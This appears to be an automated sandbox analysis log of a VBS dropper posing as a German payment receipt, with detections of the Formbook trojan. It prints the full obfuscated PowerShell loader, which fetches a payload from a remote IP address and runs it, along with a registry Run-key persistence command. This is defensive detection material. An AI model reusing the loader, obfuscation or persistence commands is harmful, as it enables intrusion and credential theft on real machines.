          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C338E020_2_04C338E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C5E8F020_2_04C5E8F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C168B820_2_04C168B8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3284020_2_04C32840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3A84020_2_04C3A840
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C9D80020_2_04C9D800
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C329A020_2_04C329A0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CFA9A620_2_04CFA9A6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3995020_2_04C39950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4B95020_2_04C4B950
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4696220_2_04C46962
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CDDAC620_2_04CDDAC6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C2EA8020_2_04C2EA80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CCDAAC20_2_04CCDAAC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C75AA020_2_04C75AA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEFA4920_2_04CEFA49
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE7A4620_2_04CE7A46
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CA3A6C20_2_04CA3A6C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE6BD720_2_04CE6BD7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C6DBF920_2_04C6DBF9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4FB8020_2_04C4FB80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEAB4020_2_04CEAB40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEFB7620_2_04CEFB76
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D136020_2_009D1360
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009C112120_2_009C1121
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009CC52020_2_009CC520
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009CA7C020_2_009CA7C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009CC74020_2_009CC740
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E9C7020_2_009E9C70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D2EB020_2_009D2EB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D2EAC20_2_009D2EAC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009D2E6B20_2_009D2E6B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23B75130 appears 36 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23BBF290 appears 103 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23BAEA12 appears 86 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23B2B970 appears 265 times
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 23B87E54 appears 89 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04C1B970 appears 248 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04C9EA12 appears 84 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04C77E54 appears 85 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04CAF290 appears 103 times
          Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04C65130 appears 36 times
          Source: Zahlungsbeleg 202405029058.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: amsi64_7316.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi32_7560.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@29/13@1/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Vaterpassenes24.AccJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13umbca1.mvr.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7316
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7560
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar 